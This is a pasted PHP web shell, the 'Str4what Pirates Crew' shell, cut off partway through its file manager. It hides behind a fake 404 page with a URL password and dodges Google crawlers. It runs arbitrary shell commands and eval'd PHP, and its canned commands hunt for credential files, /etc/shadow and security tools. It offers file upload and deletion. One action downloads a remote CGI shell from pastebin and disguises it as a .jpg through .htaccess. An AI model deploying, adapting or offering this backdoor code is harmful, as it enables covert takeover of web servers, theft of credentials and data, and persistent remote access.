· 10 years ago · May 13, 2016, 04:42 PM
1<?php
2$auth_pass="shpc"; // Change this to your desired password
3$color = "white";
4$default_action = 'FilesMan';
5@define('SELF_PATH', __FILE__);
6if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
7 header('HTTP/1.0 404 Not Found');
8 exit;
9}
10@session_start();
11@error_reporting(0);
12@ini_set('error_log',NULL);
13@ini_set('display_errors',0);
14@ini_set('log_errors',0);
15@ini_set('max_execution_time',0);
16@set_time_limit(0);
17@set_magic_quotes_runtime(0);
18@define('VERSION', 'Edited');
19if( get_magic_quotes_gpc() ) {
20 function stripslashes_array($array) {
21 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
22 }
23 $_POST = stripslashes_array($_POST);
24}
25function printLogin() {
26 echo '<h1>Not Found</h1>
27 <p>The requested URL was not found on this server.</p>
28 <hr>
29 <address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>
30 <style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style>';
31 exit;
32}
33if( !isset( $_SESSION[$_SERVER['HTTP_HOST']] ))
34 if( empty( $auth_pass ) ||
35 ( isset( $_GET['pass'] ) && ($_GET['pass'] == $auth_pass ) ) )
36 $_SESSION[$_SERVER['HTTP_HOST']] = true;
37 else
38 printLogin();
39
40if( strtolower( substr(PHP_OS,0,3) ) == "win" )
41 $os = 'win';
42else
43 $os = 'nix';
44$safe_mode = @ini_get('safe_mode');
45$disable_functions = @ini_get('disable_functions');
46$home_cwd = @getcwd();
47if( isset( $_POST['c'] ) )
48 @chdir($_POST['c']);
49$cwd = @getcwd();
50if( $os == 'win') {
51 $home_cwd = str_replace("\\", "/", $home_cwd);
52 $cwd = str_replace("\\", "/", $cwd);
53}
54if( $cwd[strlen($cwd)-1] != '/' )
55 $cwd .= '/';
56
57if($os == 'win') {
58 $aliases = array(
59 "List Directory" => "dir",
60 "Find index.php in current dir" => "dir /s /w /b index.php",
61 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
62 "Show active connections" => "netstat -an",
63 "Show running services" => "net start",
64 "User accounts" => "net user",
65 "Show computers" => "net view",
66 "ARP Table" => "arp -a",
67 "IP Configuration" => "ipconfig /all"
68 );
69} else {
70 $aliases = array(
71 "List dir" => "ls -la",
72 "list file attributes on a Linux second extended file system" => "lsattr -va",
73 "show opened ports" => "netstat -an | grep -i listen",
74 "Find" => "",
75 "find all suid files" => "find / -type f -perm -04000 -ls",
76 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
77 "find all sgid files" => "find / -type f -perm -02000 -ls",
78 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
79 "find config.inc.php files" => "find / -type f -name config.inc.php",
80 "find config* files" => "find / -type f -name \"config*\"",
81 "find config* files in current dir" => "find . -type f -name \"config*\"",
82 "find all writable folders and files" => "find / -perm -2 -ls",
83 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
84 "find all service.pwd files" => "find / -type f -name service.pwd",
85 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
86 "find all .htpasswd files" => "find / -type f -name .htpasswd",
87 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
88 "find all .bash_history files" => "find / -type f -name .bash_history",
89 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
90 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
91 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
92 "Locate" => "",
93 "locate httpd.conf files" => "locate httpd.conf",
94 "locate vhosts.conf files" => "locate vhosts.conf",
95 "locate proftpd.conf files" => "locate proftpd.conf",
96 "locate psybnc.conf files" => "locate psybnc.conf",
97 "locate my.conf files" => "locate my.conf",
98 "locate admin.php files" =>"locate admin.php",
99 "locate cfg.php files" => "locate cfg.php",
100 "locate conf.php files" => "locate conf.php",
101 "locate config.dat files" => "locate config.dat",
102 "locate config.php files" => "locate config.php",
103 "locate config.inc files" => "locate config.inc",
104 "locate config.inc.php" => "locate config.inc.php",
105 "locate config.default.php files" => "locate config.default.php",
106 "locate config* files " => "locate config",
107 "locate .conf files"=>"locate '.conf'",
108 "locate .pwd files" => "locate '.pwd'",
109 "locate .sql files" => "locate '.sql'",
110 "locate .htpasswd files" => "locate '.htpasswd'",
111 "locate .bash_history files" => "locate '.bash_history'",
112 "locate .mysql_history files" => "locate '.mysql_history'",
113 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
114 "locate backup files" => "locate backup",
115 "locate dump files" => "locate dump",
116 "locate priv files" => "locate priv"
117 );
118}
119
120function ex($in) {
121 $out = '';
122 if(function_exists('exec')) {
123 @exec($in,$out);
124 $out = @join("\n",$out);
125 }elseif(function_exists('passthru')) {
126 ob_start();
127 @passthru($in);
128 $out = ob_get_clean();
129 }elseif(function_exists('system')) {
130 ob_start();
131 @system($in);
132 $out = ob_get_clean();
133 }elseif(function_exists('shell_exec')) {
134 $out = shell_exec($in);
135 }elseif(is_resource($f = @popen($in,"r"))) {
136 $out = "";
137 while(!@feof($f))
138 $out .= fread($f,1024);
139 pclose($f);
140 }
141 return $out;
142}
143
144function which($p) {
145 $path = ex('which '.$p);
146 if(!empty($path))
147 return $path;
148 return false;
149}
150
151function printHeader() {
152 if(empty($_POST['charset']))
153 $_POST['charset'] = "UTF-8";
154 global $color;
155
156 echo '<html><head><meta http-equiv="Content-Type" content="text/html; charset='.$_POST['charset'].'"><title>.::| S.H.P.C |::.</title><link REL="SHORTCUT ICON" HREF="http://s24.postimg.org/qrcevfpqp/123.png">
157 <style>
158 body {background-color:#222;color:#888;}
159 body,td,th { font: 9pt Helvetica,Verdana;margin:0;vertical-align:top; }
160 span,h1,a { color:white !important; }
161 span { font-weight: bolder; }
162 h1 { padding: 2px 5px;font: 14pt Verdana;margin:0px;background:rgb(0,169,157);}
163 div.content { padding: 5px;margin-left:5px;}
164 a { text-decoration:none; }
165 a:hover { text-decoration:underline; }
166 .ml1 { padding:5px;margin:0;overflow: auto; }
167 .bigarea { width:100%;height:250px;margin-top:5px;}
168 input, textarea, select { margin:0;color:white;background-color:#000;border:1px solid #222; font: 9pt Monospace,"Courier New"; }
169 input[type="button"]:hover,input[type="submit"]:hover {background-color:white;color:#000;}
170 form { margin:0px; }
171 #toolsTbl { text-align:center; }
172 .toolsInp { width: 80%;border: 0; border-radius:3px;background: #333 }
173 .main th {text-align:left;font-weight: bold;}
174 .main tr:hover{background-color:#5e5e5e;}
175 .main td, th{vertical-align:middle;}
176 .menu th{padding:5px;font-weight:bold;}
177 pre {font-family:Courier,Monospace;}
178 #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
179 .logo {text-align:center;font-size:60px;}
180 .logo sup {font-size: 15px;vertical-align: top;margin-left: -14px;}
181 .cpr {margin-bottom:5px;font-weight:bold;}
182 .cpb {width:34px;margin:0 5px;}
183 .eca1 {font-size: 16px;font-weight: bold;letter-spacing: 10px;margin: 0 2px 0 17px;text-align: center;}
184 .eca2 {font-size: 13px;font-weight: bold;letter-spacing: 3px;margin: 0 2px 0 7px;text-align: center;}
185 .npoad td {padding:0;}
186 </style>
187 <script>
188 function set(a,c,p1,p2,p3,charset) {
189 if(a != null)document.mf.a.value=a;
190 if(c != null)document.mf.c.value=c;
191 if(p1 != null)document.mf.p1.value=p1;
192 if(p2 != null)document.mf.p2.value=p2;
193 if(p3 != null)document.mf.p3.value=p3;
194 if(charset != null)document.mf.charset.value=charset;
195 }
196 function g(a,c,p1,p2,p3,charset) {
197 set(a,c,p1,p2,p3,charset);
198 document.mf.submit();
199 }
200 function a(a,c,p1,p2,p3,charset) {
201 set(a,c,p1,p2,p3,charset);
202 var params = "ajax=true";
203 for(i=0;i<document.mf.elements.length;i++)
204 params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
205 sr("'.$_SERVER['REQUEST_URI'].'", params);
206 }
207 function sr(url, params) {
208 if (window.XMLHttpRequest) {
209 req = new XMLHttpRequest();
210 req.onreadystatechange = processReqChange;
211 req.open("POST", url, true);
212 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
213 req.send(params);
214 }
215 else if (window.ActiveXObject) {
216 req = new ActiveXObject("Microsoft.XMLHTTP");
217 if (req) {
218 req.onreadystatechange = processReqChange;
219 req.open("POST", url, true);
220 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
221 req.send(params);
222 }
223 }
224 }
225 function processReqChange() {
226 if( (req.readyState == 4) )
227 if(req.status == 200) {
228 //alert(req.responseText);
229 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
230 var arr=reg.exec(req.responseText);
231 eval(arr[2].substr(0, arr[1]));
232 }
233 else alert("Request error!");
234 }
235 </script>
236 <head><body>
237 <hr style="border:6px solid gold;margin:0;"padding-bottom:5px;></hr>
238
239 <div style="position:absolute;width:100%;top:0;left:0;"><div><div class="content" "><br>
240 <form method=post name=mf style="display:none;">
241 <input type=hidden name=a value="'.(isset($_POST['a'])?$_POST['a']:'').'">
242 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
243 <input type=hidden name=p1 value="'.(isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'">
244 <input type=hidden name=p2 value="'.(isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'').'">
245 <input type=hidden name=p3 value="'.(isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'').'">
246 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
247 </form>';
248 $freeSpace = @diskfreespace($GLOBALS['cwd']);
249 $totalSpace = @disk_total_space($GLOBALS['cwd']);
250 $totalSpace = $totalSpace?$totalSpace:1;
251 $disable_functions = @ini_get('disable_functions');
252 $release = @php_uname('r');
253 $kernel = @php_uname('s');
254 if(!function_exists('posix_getegid')) {
255 $user = @get_current_user();
256 $uid = @getmyuid();
257 $gid = @getmygid();
258 $group = "?";
259 } else {
260 $uid = @posix_getpwuid(@posix_geteuid());
261 $gid = @posix_getgrgid(@posix_getegid());
262 $user = $uid['name'];
263 $uid = $uid['uid'];
264 $group = $gid['name'];
265 $gid = $gid['gid'];
266 }
267 $cwd_links = '';
268 $path = explode("/", $GLOBALS['cwd']);
269 $n=count($path);
270 for($i=0;$i<$n-1;$i++) {
271 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
272 for($j=0;$j<=$i;$j++)
273 $cwd_links .= $path[$j].'/';
274 $cwd_links .= "\")'>".$path[$i]."/</a>";
275 }
276 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
277 $opt_charsets = '';
278 foreach($charsets as $item)
279 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
280 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Bypasser'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Readable Dirs'=>'Readable','Image Backdoor'=>'IMGB','Symlink'=>'Symlink','CgiShell'=>'CgiShell','About'=>'About');
281 if(!empty($GLOBALS['auth_pass']))
282 $menu = '';
283 foreach($m as $k => $v)
284 $menu .= '<th '.(int)(1/count($m)).'%"><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a></th>';
285 $drives = "";
286 if ($GLOBALS['os'] == 'win') {
287 foreach( range('a','z') as $drive ){
288 if (is_dir($drive.':\\'))
289 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
290 }
291 $drives .= '<br />: ';
292 }
293 if($GLOBALS['os'] == 'nix') {
294 $dominios = @file_get_contents("/etc/named.conf");
295 if(!$dominios) {
296 $d0c = "CANT READ named.conf";
297 } else {
298 @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
299 $out = sizeof(array_unique($out[1]));
300 $d0c = $out." Domains";
301 }
302 } else {
303 $d0c = " --- ";
304 }
305 if($GLOBALS['os'] == 'nix' )
306 {
307 $usefl = ''; $dwnldr = '';
308 if(!@ini_get('safe_mode')) {
309 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
310 foreach($userful as $item) { if(which($item)) $usefl.= $item.','; }
311
312 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
313 foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.','; }
314 } else {
315 $usefl = ' ------- '; $dwnldr = ' ------- ';
316 }
317 } else {
318 $usefl = ' ------- '; $dwnldr = ' ------- ';
319 }
320 echo '<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i44.tinypic.com/1175nkj.gif" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;width:160px;"><div class="eca1">Str4what</div><div class="eca2">P1rates Crew</div></td>
321
322 <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>
323 <tr><td><span>User</span></td><td>: '.$uid.' ( '.$user.' ) <span>Group: </span> '.$gid.' ( '.$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.$dwnldr.'</td></tr><tr><td><span>Disabled functions</span></td><td>: '.($disable_functions?$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.($GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a></td></tr></table></td>'.
324 '<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.
325 '<td><nobr>: '.gethostbyname($_SERVER["HTTP_HOST"]).'<br>: '.$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize($totalSpace).'<br />: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a><br />: '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=lime <b>OFF</b></font>').'<br />: '.$d0c.'</nobr></td></tr></table>'.
326 '</div></div><div style="margin:5;"><div class="content" style="padding:2px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>'.$menu.'</tr></table></div></div><div ">';
327}
328
329function printFooter() {
330 $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
331
332echo '</div><div style=""><div class="content" style="">
333<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">
334 <tr><hr>
335 <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form></td>
336 <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form></td>
337 </tr>
338 <tr>
339 <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit style="margin-left:5px;border:none;background:#333;border-radius:4px;" value=">>"></form>'.$is_writable.'</td>
340 <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form>'.$is_writable.'</td>
341 </tr>
342 <tr>
343 <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit style="margin-left:5px;border:none;background:#333;border-radius:4px;" value=">>"></form></td>
344 <td><form method="post" ENCTYPE="multipart/form-data">
345 <input type=hidden name=a value="FilesMAn">
346 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
347 <input type=hidden name=p1 value="uploadFile">
348 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
349 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form>'.$is_writable.'</td>
350 </tr>
351</table></div></div>
352<div style="margin:5px;"><div class="content" style="text-align:center;font-weight:bold;">Str4what Pirates Crew Shell '.VERSION.', © Zoro </div></div>
353</div>
354</body></html>';
355}
356
357if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
358if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
359
360
361function viewSize($s) {
362 if($s >= 1073741824)
363 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
364 elseif($s >= 1048576)
365 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
366 elseif($s >= 1024)
367 return sprintf('%1.2f', $s / 1024 ) . ' KB';
368 else
369 return $s . ' B';
370}
371
372function perms($p) {
373 if (($p & 0xC000) == 0xC000)$i = 's';
374 elseif (($p & 0xA000) == 0xA000)$i = 'l';
375 elseif (($p & 0x8000) == 0x8000)$i = '-';
376 elseif (($p & 0x6000) == 0x6000)$i = 'b';
377 elseif (($p & 0x4000) == 0x4000)$i = 'd';
378 elseif (($p & 0x2000) == 0x2000)$i = 'c';
379 elseif (($p & 0x1000) == 0x1000)$i = 'p';
380 else $i = 'u';
381 $i .= (($p & 0x0100) ? 'r' : '-');
382 $i .= (($p & 0x0080) ? 'w' : '-');
383 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
384 $i .= (($p & 0x0020) ? 'r' : '-');
385 $i .= (($p & 0x0010) ? 'w' : '-');
386 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
387 $i .= (($p & 0x0004) ? 'r' : '-');
388 $i .= (($p & 0x0002) ? 'w' : '-');
389 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
390 return $i;
391}
392
393function viewPermsColor($f) {
394 if (!@is_readable($f))
395 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
396 elseif (!@is_writable($f))
397 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
398 else
399 return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
400}
401
402if(!function_exists("scandir")) {
403 function scandir($dir) {
404 $dh = opendir($dir);
405 while (false !== ($filename = readdir($dh))) {
406 $files[] = $filename;
407 }
408 return $files;
409 }
410}
411
412function actionSecInfo() {
413 printHeader();
414 echo '<h1>Server security information</h1><div class=content>';
415 function showSecParam($n, $v) {
416 $v = trim($v);
417 if($v) {
418 echo '<span>'.$n.': </span>';
419 if(strpos($v, "\n") === false)
420 echo $v.'<br>';
421 else
422 echo '<pre class=ml1>'.$v.'</pre>';
423 }
424 }
425
426 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
427 showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
428 showSecParam('Open base dir', @ini_get('open_basedir'));
429 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
430 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
431 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
432 $temp=array();
433 if(function_exists('mysql_get_client_info'))
434 $temp[] = "MySql (".mysql_get_client_info().")";
435 if(function_exists('mssql_connect'))
436 $temp[] = "MSSQL";
437 if(function_exists('pg_connect'))
438 $temp[] = "PostgreSQL";
439 if(function_exists('oci_connect'))
440 $temp[] = "Oracle";
441 showSecParam('Supported databases', implode(', ', $temp));
442 echo '<br>';
443
444 if( $GLOBALS['os'] == 'nix' ) {
445 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
446 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
447 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
448 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
449 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
450 showSecParam('OS version', @file_get_contents('/proc/version'));
451 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
452 if(!$GLOBALS['safe_mode']) {
453 echo '<br>';
454 $temp=array();
455 foreach ($userful as $item)
456 if(which($item)){$temp[]=$item;}
457 showSecParam('Userful', implode(', ',$temp));
458 $temp=array();
459 foreach ($danger as $item)
460 if(which($item)){$temp[]=$item;}
461 showSecParam('Danger', implode(', ',$temp));
462 $temp=array();
463 foreach ($downloaders as $item)
464 if(which($item)){$temp[]=$item;}
465 showSecParam('Downloaders', implode(', ',$temp));
466 echo '<br/>';
467 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
468 showSecParam('HDD space', ex('df -h'));
469 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
470 }
471 } else {
472 showSecParam('OS Version',ex('ver'));
473 showSecParam('Account Settings',ex('net accounts'));
474 showSecParam('User Accounts',ex('net user'));
475 }
476 echo '</div>';
477 printFooter();
478}
479
480function actionPhp() {
481 if( isset($_POST['ajax']) ) {
482 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
483 ob_start();
484 eval($_POST['p1']);
485 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
486 echo strlen($temp), "\n", $temp;
487 exit;
488 }
489 printHeader();
490 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
491 echo '<h1>PHP info</h1><div class=content>';
492 ob_start();
493 phpinfo();
494 $tmp = ob_get_clean();
495 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
496 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
497 $tmp = preg_replace('!h1!msiU','h2',$tmp);
498 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
499 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
500 echo $tmp;
501 echo '</div><br>';
502 }
503 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
504 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
505 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
506 echo ' <input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
507 if(!empty($_POST['p1'])) {
508 ob_start();
509 eval($_POST['p1']);
510 echo htmlspecialchars(ob_get_clean());
511 }
512 echo '</pre></div>';
513 printFooter();
514}
515
516function actionCgiShell(){
517printHeader();
518$path = getcwd();
519$file = '
520Options FollowSymLinks MultiViews Indexes ExecCGI
521AddType application/x-httpd-cgi .jpg
522AddHandler cgi-script .jpg
523AddHandler cgi-script .jpg
524';
525mkdir("~zoro", 0755);
526$b = fopen($path.'/~zoro/.htaccess', 'w');
527fwrite($b,$file);
528fclose($b);
529$file = file_get_contents('http://pastebin.com/raw.php?i=weQnyJgN');
530$b = fopen($path.'/~zoro/zoro.jpg', 'w');
531fwrite($b,$file);
532fclose($b);
533chmod($path.'/~zoro/zoro.jpg', 0755);
534echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>CGI-Telnet Version 1.4 </span><br><font face='Tahoma' color='#007700' size='2pt'>Password : zoro</font><center><br><a href='/~zoro/zoro.jpg'>ACCESS THE CGI SHELL HERE</a><br><br><iframe src=~zoro/zoro.jpg width=85% frameborder=0></iframe>
535
536</div></center>";
537
538
539}
540function actionFilesMan() {
541 printHeader();
542 echo '<h1>File manager</h1><div class=content>';
543 if(isset($_POST['p1'])) {
544 switch($_POST['p1']) {
545 case 'uploadFile':
546 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
547 echo "Can't upload file!";
548 break;
549 break;
550 case 'mkdir':
551 if(!@mkdir($_POST['p2']))
552 echo "Can't create new dir";
553 break;
554 case 'delete':
555 function deleteDir($path) {
556 $path = (substr($path,-1)=='/') ? $path:$path.'/';
557 $dh = opendir($path);
558 while ( ($item = readdir($dh) ) !== false) {
559 $item = $path.$item;
560 if ( (basename($item) == "..") || (basename($item) == ".") )
561 continue;
562 $type = filetype($item);
563 if ($type == "dir")
564 deleteDir($item);
565 else
566 @unlink($item);
567 }
568 closedir($dh);
569 rmdir($path);
570 }
571 if(is_array(@$_POST['f']))
572 foreach($_POST['f'] as $f) {
573 $f = urldecode($f);
574 if(is_dir($f))
575 deleteDir($f);
576 else
577 @unlink($f);
578 }
579 break;
580 case 'paste':
581 if($_SESSION['act'] == 'copy') {
582 function copy_paste($c,$s,$d){
583 if(is_dir($c.$s)){
584 mkdir($d.$s);
585 $h = opendir($c.$s);
586 while (($f = readdir($h)) !== false)
587 if (($f != ".") and ($f != "..")) {
588 copy_paste($c.$s.'/',$f, $d.$s.'/');
589 }
590 } elseif(is_file($c.$s)) {
591 @copy($c.$s, $d.$s);
592 }
593 }
594 foreach($_SESSION['f'] as $f)
595 copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
596 } elseif($_SESSION['act'] == 'move') {
597 function move_paste($c,$s,$d){
598 if(is_dir($c.$s)){
599 mkdir($d.$s);
600 $h = opendir($c.$s);
601 while (($f = readdir($h)) !== false)
602 if (($f != ".") and ($f != "..")) {
603 copy_paste($c.$s.'/',$f, $d.$s.'/');
604 }
605 } elseif(is_file($c.$s)) {
606 @copy($c.$s, $d.$s);
607 }
608 }
609 foreach($_SESSION['f'] as $f)
610 @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
611 }
612 unset($_SESSION['f']);
613 break;
614 default:
615 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
616 $_SESSION['act'] = @$_POST['p1'];
617 $_SESSION['f'] = @$_POST['f'];
618 foreach($_SESSION['f'] as $k => $f)
619 $_SESSION['f'][$k] = urldecode($f);
620 $_SESSION['cwd'] = @$_POST['c'];
621 }
622 break;
623 }
624 echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
625 }
626 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
627 if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
628 global $sort;
629 $sort = array('name', 1);
630 if(!empty($_POST['p1'])) {
631 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
632 $sort = array($match[1], (int)$match[2]);
633 }
634 echo '<script>
635 function sa() {
636 for(i=0;i<document.files.elements.length;i++)
637 if(document.files.elements[i].type == \'checkbox\')
638 document.files.elements[i].checked = document.files.elements[0].checked;
639 }
640 </script>
641 <table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
642 <form name=files method=post>';
643 echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
644 $dirs = $files = $links = array();
645 $n = count($dirContent);
646 for($i=0;$i<$n;$i++) {
647 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
648 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
649 $tmp = array('name' => $dirContent[$i],
650 'path' => $GLOBALS['cwd'].$dirContent[$i],
